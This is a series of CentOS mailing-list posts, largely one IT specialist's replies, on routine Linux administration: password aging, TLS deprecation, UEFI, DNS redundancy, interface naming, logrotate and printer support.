Re: [CentOS] Limit user password by time
chage apparently depends on the shadow file which is day-based. You might want to be more specific when you say "limit", are you trying to force password changes every 2 hours or force logout every 2 hours or something else? The reason I ask is you're probably into the "create your own method" arena where exactly what you're trying to do may greatly influence the possibilities. From: CentOS on behalf of Gestió Servidors Sent: Monday, November 4, 2019 3:28 AM To: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] Limit user password by time Is it possible with "chage" to configure a password caducity for, at most, 2 hours? I think "chage" only allows caducity for, at least, one day. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] easy way to stop old ssl's
Just saw the original message (Outlook Web Access isn't the greatest in presenting threads). I had to do it manually but the number of settings to change was small (for a fairly simple website). I would think a sed script inside a for loop would do for a system. If you have a large number of systems then it's time to look at Puppet/Ansible/Chef. From: CentOS on behalf of Leroy Tennison Sent: Friday, October 11, 2019 11:48 PM To: CentOS mailing list Subject: Re: [CentOS] easy way to stop old ssl's Without context it's impossible to make firm statements but, having gone through this a while back (and discovering that less than 1 percent of an examined list of connections couldn't support current ssl - mainly Apple hardware), who do you want to protect? Is it the minority who won't/can't upgrade or the majority who have? And, do you have to protect yourself from liability (regulatory or contractual)? If the environment is in any way sensitive (Personally Identifiable Information, Health data, Credit Card data) then the answer is obvious. Harriscomputer Register now for the dataVoice User Conference, October 9-11 at the Gaylord Rockies in Denver, CO. To register click Here<https://www.harriscomputer.com/en/events/> Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Warren Young Sent: Friday, October 11, 2019 3:58 PM To: CentOS mailing list Subject: [EXTERNAL] Re: [CentOS] easy way to stop old ssl's Harriscomputer Register now for the dataVoice User Conference, October 9-11 at the Gaylord Rockies in Denver, CO. To register click Here<https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.harriscomputer.com%2fen%2fevents%2f=E,1,4J7-GGGBpU9KBPfPZ7bL730w7WiyJlctx6iIvi5PWH7ZM8lC_dVONfXLuYIqLeXHJdKEpUhep3pXkJ3H5aKy9zTmVcdXIuVUQwAE9dGXbSxuwQ8,=1> Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.datavoiceint.com=E,1,1CVIwFnqDNjeMobHyItdRlGR_7-a25a9csDCwUICadY6cNeNGWLIh7RYua2hi0wTgCsLyEWcZhDFXu0XIqOzIqg62dgI8l7698aRzx0KHSU6X2L5SVbV=1<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<https://linkprotect.cudasvc.com/url?a=http%3a%2f%2fsubscribe.harriscomputer.com%2f=E,1,5g3DWaevZ_6CRMR9DZ2NvFs6mv0LUL7Ceslt7x0pEY9xRa4IkwRngZxDYuKiPPTTL5ikJeKoHbPkB7LfS3v_n8-NYxZO_2Emr5Y89EPatHmO_a2MY-Ol3A,,=1>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. On Oct 11, 2019, at 2:52 PM, isdtor wrote: > >> Yes, breaking changes. Doing this *will* cut off support for older >> browsers. On purpose. > > Old browsers aren't really the problem. Even ff 45 (?) from CentOS5 will > happily access a TLSv1.2-only server. IE 10 and older won’t, though: https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fcaniuse.com%2f%23feat%3dtls1-2=E,1,OoDXU9RwckHnPZSdyy1A-Mat1VYd83r6qJeujdFE_9jDKQp4hvmqnE9CbbcsCi5OsTOOx75sM1xfwvskBnYzTm7sNq1P3DnbfLyLhGR491ys6viVqTrf=1 > The problem is user that have old versions of software installed with no > TLSv1.2 support. SVN, python 2.7 scripts, etc. Also true. There’s a lot of stuff still linked to OpenSSL 1.0.0 and 0.98. ___ Cent
Re: [CentOS] easy way to stop old ssl's
Without context it's impossible to make firm statements but, having gone through this a while back (and discovering that less than 1 percent of an examined list of connections couldn't support current ssl - mainly Apple hardware), who do you want to protect? Is it the minority who won't/can't upgrade or the majority who have? And, do you have to protect yourself from liability (regulatory or contractual)? If the environment is in any way sensitive (Personally Identifiable Information, Health data, Credit Card data) then the answer is obvious. From: CentOS on behalf of Warren Young Sent: Friday, October 11, 2019 3:58 PM To: CentOS mailing list Subject: [EXTERNAL] Re: [CentOS] easy way to stop old ssl's Harriscomputer Register now for the dataVoice User Conference, October 9-11 at the Gaylord Rockies in Denver, CO. To register click Here<https://www.harriscomputer.com/en/events/> Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. On Oct 11, 2019, at 2:52 PM, isdtor wrote: > >> Yes, breaking changes. Doing this *will* cut off support for older >> browsers. On purpose. > > Old browsers aren't really the problem. Even ff 45 (?) from CentOS5 will > happily access a TLSv1.2-only server. IE 10 and older won’t, though: https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fcaniuse.com%2f%23feat%3dtls1-2=E,1,OoDXU9RwckHnPZSdyy1A-Mat1VYd83r6qJeujdFE_9jDKQp4hvmqnE9CbbcsCi5OsTOOx75sM1xfwvskBnYzTm7sNq1P3DnbfLyLhGR491ys6viVqTrf=1 > The problem is user that have old versions of software installed with no > TLSv1.2 support. SVN, python 2.7 scripts, etc. Also true. There’s a lot of stuff still linked to OpenSSL 1.0.0 and 0.98. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] [EXTERNAL] UEFI booting
My experience with UEFI is that it is a black art. Fought with it until a deadline forced me to non-UEFI. In my case a drive-based UEFI partition (FAT32) was required. See if efibootmgr is available and would help you. I should note that, in the process. I discovered that the UEFI standard makes no provision for RAID if it is disk-based. I would love to hear someone contradict me on that and point me to documentation on how to do it without resorting to exotic maneuvers. From: CentOS on behalf of Jerry Geis Sent: Thursday, September 19, 2019 6:42 AM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] UEFI booting I installed my first UEFI disk yesterday. Seemed to go fine. CentOS 7.6 x86_64 I then took that disk "out" of that machine and put it another machine - it seems to not even boot. I put the original disk back in that machine and it boots fine. I put the UEFI disk back in the machine I built it on and it works fine. They are similar machines either and i3 and i7. Shouldn't that work? Build a UEFI disk on machine A - move it to machine B? Thanks Jerry ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] how to increase DNS reliability?
This brings up one of the caveats for (at least ISC) DNS, if the master goes down the slaves will take over for a time but eventually will stop serving for the domains of the master if it remains down too long. If my (sometimes faulty) memory serves me well it is in the three day range (but configurable) which is ample time unless the problem occurs early in a holiday weekend and and the notification/escalation process isn't what it should be (Murphey's Law)... From: CentOS on behalf of Nataraj Sent: Thursday, July 25, 2019 6:31:26 PM To: centos@centos.org Harriscomputer Register now for the dataVoice User Conference, October 9-11 at the Gaylord Rockies in Denver, CO. To register click Here<https://www.harriscomputer.com/en/events/> Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here<http://subscribe.harriscomputer.com/>. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. Subject: [EXTERNAL] Re: [CentOS] how to increase DNS reliability? On 7/25/19 1:10 PM, hw wrote: >> >> Configure all dns servers as primary slaves (plus 1 primary master) for >> your own domains. I have never seen problems with resolution of local >> dns domains when the Internet was down. > > It seemed to have to do with the TTL for the local names being too > short and DNS being designed to generally query root servers rather > than sticking to their local information. It has nothing to do with the ttl. The TTL does cause expiration in an authoritative server. TTLs only affect caching servers. The primary master gets changed when you edit the local zone database. The secondary slave gets updated when the serial number in the SOA record on the primary master gets bumped. You must either do that manually or use a zone database management tool that does it for you. If a dns server is configured as a primary master or a secondary slave for a domain, then it is authoritative for that domain and does not require queries to any other server on your network or on the Internet. The difference between a primary master and a secondary slave is the primary master is where you edit the zone records and the secondary slave replicates the zone database from the primary master. Even if the primary master goes down, the secondary slave still has a copy of the zone files in it's disk files (or other database format that you configure) and will server them flawlessly. One way to see if a server is properly configured as authoritative for a domain is: nataraj@pygeum:~$ dig mydomain.com. soa @127.0.0.1 ; <<>> DiG 9.11.3-1ubuntu1.8-Ubuntu <<>> mydomain.com. soa@127.0.0.1 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 52104 ;; flags: qr *aa* rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 3, ADDITIONAL: 4 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ; COOKIE: 64f402c0c22d57aa2bbb10fc5d3a340d8c19377b924d01c2 (good) ;; QUESTION SECTION: ;mydomain.com.INSOA ;; ANSWER SECTION: Mydomain.Com.14400INSOAns1.mydomain.com. postmaster.Mydomain.COM. 2019072505 1200 600 15552000 14400 ;; AUTHORITY SECTION: Mydomain.Com.14400INNSns1.Mydomain.Com. Mydomain.Com.14400INNSns2.Mydomain.Com. Mydomain.Com.14400INNSns3.Mydomain.com. ;; ADDITIONAL SECTION: ns1.mydomain.com.14400INA8.8.8.8 ;; Query time: 1 msec ;; SERVER: 127.0.0.1#53(127.0.0.1) ;; WHEN: Thu Jul 25 15:58:21 PDT 2019 ;; MSG SIZE rcvd: 243 The AA flag in the flags section tells you that you have queried a dns server that is authoritative for the domain that you queried. If it doesn't have the AA flag then you have not properly set up the primary master or secondary slave for that domain. If your masters and slaves are all configured correctly for a domain then they will all have the same serial number in the SOA record (and same results for any query in that domain). If they d
[CentOS] how to increase DNS reliability?
If you don't want multiple DNS server entries on the client then a master and (possibly multiple) slave server configuration can be set up (I'm assuming ISC DNS - their solution to redundancy/failover is master and slave servers, this may be the way it is with all DNS). keepalived can be used for fail over and will present a single IP address (which the clients would use) shared among the servers. haproxy or alternatives might be another fail over option. Each technology has its own learning curve (and doing this will require at least two) and caveats. In particular systemd doesn't appear to play well with technologies creating IP addresses it doesn't manage. The version of keepalived we're using also has its own nasty quirk as well where it comes up assuming it is master until discovered otherwise, this is true even if it is configured as backup. In most cases this is probably either a non-issue (no scripts being used) or a minor annoyance. But if you're using scripts trigger ed by keepalived which make significant (and possibly conflicting) changes to the environment then you'll need to embed "intelligence" in them to wait until final state is reached or test state before acting or some other option. From: CentOS on behalf of hw Sent: Thursday, July 25, 2019 7:51:39 AM To: centos@centos.org Subject: [EXTERNAL] [CentOS] how to increase DNS reliability? Hi, how can DNS reliability, as experienced by clients on the LAN who are sending queries, be increased? Would I have to set up some sort of cluster consisting of several servers all providing DNS services which is reachable under a single IP address known to the clients? Just setting up several name servers and making them known to the clients for the clients to automatically switch isn't a good solution because the clients take their timeouts and users lacking even the most basic knowledge inevitably panic when the first name server does not answer queries. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Register now for the dataVoice User Conference, October 9-11 at the Gaylord Rockies in Denver, CO. To register click Here<https://www.harriscomputer.com/en/events/> Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here<http://subscribe.harriscomputer.com/>. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] How to restore the old network interface name?
Might look into 70-persistent-net.rules in addition to the article below (do your web research for that and CentOS 7), it's a file you probably have to create (not necessarily auto-generated as some documentation says) under /etc/udev/rules.d. There have been two known formats for that file and a given format doesn't work in all cases. Here are the formats I've seen, hope it helps (everything below is literal except what's contained in the less/greater than delimiters): SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="", ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNEL=="eth*", NAME="" SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="", ATTR{dev_id}=="0x0", ATTR{type}=="1", NAME="" Note the missing KERNEL==... in the latter form. From: CentOS on behalf of Ralf Prengel Sent: Tuesday, July 2, 2019 4:56 AM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] How to restore the old network interface name? Hallo, I need the device eth0 for one tool using centos 7.6. Using this tutorial https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.certdepot.net%2frhel7-restore-old-network-interface-name%2f=E,1,_N-6Ga7-RXX-iwhg9-7842nyxrBXlZ3jmvPHUhIYBoIRbfi51krljOSNJKWZlazwotUW4gPX0NsSZ6l6Sjdtdaba3SAt1YES6sfHIll53M2YxmPjTrrb98aASA,,=1 doesn t work. Thanks for a hint. Ralf _______ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here<http://subscribe.harriscomputer.com/>. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] Bash completion thrown by quoted option args?
I am going to take a really wild guess and say "Try replacing the outermost quotes with single quotes or escape the double quotes around the numeral 1". Your second example has double quotes within double quotes and I'm wondering if that's getting rendered as "yum --debuglevel=" 1 " install ..." (extra space added for emphasis). From: CentOS on behalf of isdtor Sent: Thursday, May 23, 2019 9:47:20 AM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] Bash completion thrown by quoted option args? There was a thread about C7 bash completion back in August last year, but it doesn't have answers for this problem. Example: "yum install /path/to/local/package" works fine with tab completion to fill in the path and package bits. However, "yum --debuglevel="1" install ..." just gets stuck and doesn't offer anything. The only option is to type everything out, or type enough to use a wildcard. After more testing, I found that any option argument that is quoted breaks completion. Which in turn makes me think this is not even specific to yum but bash completion in general. Bug? Upstream bug? ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here<http://subscribe.harriscomputer.com/>. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Opera browser on CentOS
Although not on CentOS, I have run Opera for some time as a result of my dislike of some of the politics elsewhere. It has some unique features but I have not found it to be as compatible as Firefox, there are situations where it does not work and Firefox does. Unfortunately I haven't gone to the effort to categorize those experiences, they aren't too frequent. From: CentOS on behalf of Greg Bailey Sent: Monday, May 20, 2019 8:35:40 AM To: centos@centos.org Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here<http://subscribe.harriscomputer.com/>. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. Subject: [EXTERNAL] Re: [CentOS] Opera browser on CentOS On 5/20/19 6:22 AM, H wrote: > Is anyone running the Opera browser on Centos 7 or 6? While not available in > a yum-repository, it seems to be available as a snap-package. Not familiar > with those yet but curious if the browser is worthwhile to run. I have > generally found Firefox less useful/compatible than Chromium but would also > like alternatives, particularly since Opera defaults to a VPN-connection. > > It is available in opera's yum repository: [opera] name=Opera packages type=rpm-md baseurl=https://rpm.opera.com/rpm gpgcheck=1 gpgkey=https://rpm.opera.com/rpmrepo.key enabled=1 I only run it very occasionally, in cases where I want a second login session to AWS that's different from my primary Firefox session, etc. -Greg ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Are linux distros redundant?
Another point is that Ubuntu is not just a Fedora alternative, they have a long-term support option known as LTS - all the even numbered releases: 14.04 (at EOL), 16.04, 18.04 (latest). I have heard that for 18.04 forward, they are going to a 10-year support model. For a Fedora alternative the odd-numbered releases should be used. From: CentOS on behalf of Andrew Holway Sent: Wednesday, April 24, 2019 12:08:14 PM To: Simon Matter; centos Subject: [EXTERNAL] Re: [CentOS] Are linux distros redundant? > Maybe you should try to explain to your manager why RHEL/CentOS exist and > why it's widely used in the corporate world. If he talks about Ubuntu then > you could explain to him what Fedora is any why and how it differs from > RHEL/CentOS. > I'm not really sure that the reasons for Rhel really exist anymore. The oft quoted Library stabilty is more of a hindrance than a help in modern development environments with well operating CI. When the dinosaur IBM bought RH it was clear that it had become a fossil. Of course there is still legacy applications that need that but I see a definite shift away from OS dependant monoliths even in the more traditional enterprises > > ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here<http://subscribe.harriscomputer.com/>. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] read permission on rotated logs
Maybe I'm missing something here but doesn't logrotate have the 'postrotate ... endscript' block for its configuration files where you can run any command you desire? Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Alice Wonder Sent: Wednesday, March 13, 2019 5:13 PM To: centos@centos.org Subject: [EXTERNAL] [CentOS] read permission on rotated logs When logs (e.g. /var/log/maillog) are rotated (e.g. to /var/log/maillog-MDD) is there a way via systemd or whatever to assign read permission to a specific group? Right now, for example - ls -l maillog* -rw--- 1 root root 3105240 Mar 13 22:04 maillog -rw--- 1 root root 1079031 Feb 24 04:39 maillog-20190224 -rw--- 1 root root 7237640 Mar 1 12:59 maillog-20190228 -rw--- 1 root root 1297508 Mar 3 04:21 maillog-20190303 -rw--- 1 root root 1319371 Mar 10 08:17 maillog-20190310 What I would like - ls -l maillog* -rw--- 1 root root 3105240 Mar 13 22:04 maillog -rw-r- 1 root somegroup 1079031 Feb 24 04:39 maillog-20190224 -rw-r- 1 root somegroup 7237640 Mar 1 12:59 maillog-20190228 -rw-r- 1 root somegroup 1297508 Mar 3 04:21 maillog-20190303 -rw-r- 1 root somegroup 1319371 Mar 10 08:17 maillog-20190310 That way a user in somegroup could run a script that analyzes the rotated logs w/o needing root privileges. Obviously I could put a script in /etc/cron.hourly that looks for rotated log files and changes ownership / permission, but I am wondering if there is a "proper" way to configure it via systemd or another utility. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] Centos installer not detecting hard drive
This may be a remote possibility because it happened to me long ago but, were these disks used for something else previously? I had a situation where something "special" a program did on the disk caused Linux to not recognize the drive. In that case I was able to use the manufacturer's "restore the drive to its original condition" program to remove the problem. I've also seen other situations where using dd to write zeros to the first 10K or so of the drive got around problems (if the drive is even recognized...). If this is your situation and the manufacturer doesn't offer a "restore..." program you might try other distros' "leading edge" Live CDs to hopefully detect the drive and do something with it then install CentOS. Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of Farid Izem Sent: Tuesday, March 12, 2019 4:16 PM To: centos@centos.org Subject: [EXTERNAL] [CentOS] Centos installer not detecting hard drive Hi, I have a new labtop and i want to install CentOS 7.6 on it. My labtop has two hard drives : - A 256Go SSD - A standard 1 To hard drive None of the two hard drives are detected by the Centos installer consequently i can't proceed with the installation. If i try with a Fedora server distro, then the standard hard drive is detected, the SSD one is still not detected. I do prefer to install Centos as is is the closed Linux version from RHEL, so what can i do to solve the issue ? Regards, Faird ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] HPlip Mark Roth/Jon LaBadie .
We've pretty much defined what printer vendors aren't worth considering. What printer manufacturers are good to consider for Linux? Is the information at www.openprinting.org/printers as good as you can get or are other sources better? Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. These companies are listed here . If you prefer not to be contacted by Harris Operating Group please notify us . This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: CentOS on behalf of mark Sent: Wednesday, February 27, 2019 1:04 PM To: CentOS mailing list Subject: [EXTERNAL] Re: [CentOS] HPlip Mark Roth/Jon LaBadie . Valeri Galtsev wrote: > On 2/27/19 9:16 AM, mark wrote: >> Ger van Dijck wrote: >>> >>> The problems with HPlip goes on and on : I can not manage to >>> establish a connection on WiFi with the HP4620 : I can print to the >>> printer but not scan . Running hp-check results in cups is not >>> running, hplip is not properly (HP) installed , xsane is not installed >>> etc.. But I can assure you all this software is properly installed : >>> Hp-check cannot detect the >>> scanfunction on the HP4620. When running on USB cable all runs fine ! >>> >>> Maybe Bug 1683312 from Zdenek Dohnal (Red Hat) could be helpfull : I >>> reported this bug . >>> >>> Hp does not support Unix/Linux applications ! Are they really so >>> stupid to think that the world excist by MS and all other users do not >>> need support: >>> Arrogance or stupidity ? >>> >> The inheritance of Carly. I was on the phone yesterday to HP - we just >> bought this printer, and it's under warranty. The engineer I spoke >> with told me he'd been there since '99, and he could tell me how to >> dissassemble and rebuild this brand new poster printer in his sleep. He >> does not, however, know software When I mentioned that HP has >> support in '12 for Macs - I was hoping to get the .ppd from the Mac >> package, as we had for the z3200ps in '12 - he told me they'd gotten rid >> of the Mac support team. >> >> Yes: no software support. >> > > > I figure, I will add some rant about HP printer department. > > But first of all, I have to tell how great HP printer department was in > the past. The past in my book is some 5 years ago and before that. About > decade ago Xerox went really bad. They started making small changes to > models, so tones were not compatible between them, thus they got rid of > 3rd party vendors selling "compatible" toners for their printers (who > will start production for something that covers only small number of > potential customers). I didn't see an indication of really bad thing then, > but some 5 years down the road they stopped making supplies for their > printers, and no "compatibles" were being produced by anybody. So, all > Xerox printers 5 years young (I hate to use word "old" here) were > just junk. That day I said: I will never buy any Xerox anything, period. > Yes I still agree with their old motto saying that they taught the world > how to copy. > > By that time we also had a bunch of HP printers, and we happily kept > getting newer models of HP printers. As a great example I would mention: > about a year ago I almost retired HP LaserJet 4050 (b/w printer), that was > heavily used in the Department for about 15 years, still working, still > making prints of great quality, supplies for which still were produced by > HP. So, HP was my life saver as far as printers go. > > > Now finally to the rant: I recently started having issues, or rather > single issue (jam of duplex jobs) with two of HP Color LaserJet CP4525 > printers. Two, not just one. And now that I'm trying to find RELIABLE > enterprise level printer for the department, I can not. It sounds like > models HP manufacture now are not reliable. A few reliable ones were just > discontinued recently. So, I'm dead in the water: what next printer to get > for the department where it is used heavily? (yes, I included
[CentOS] dont run cron.d- when cron.daily-scripts are running
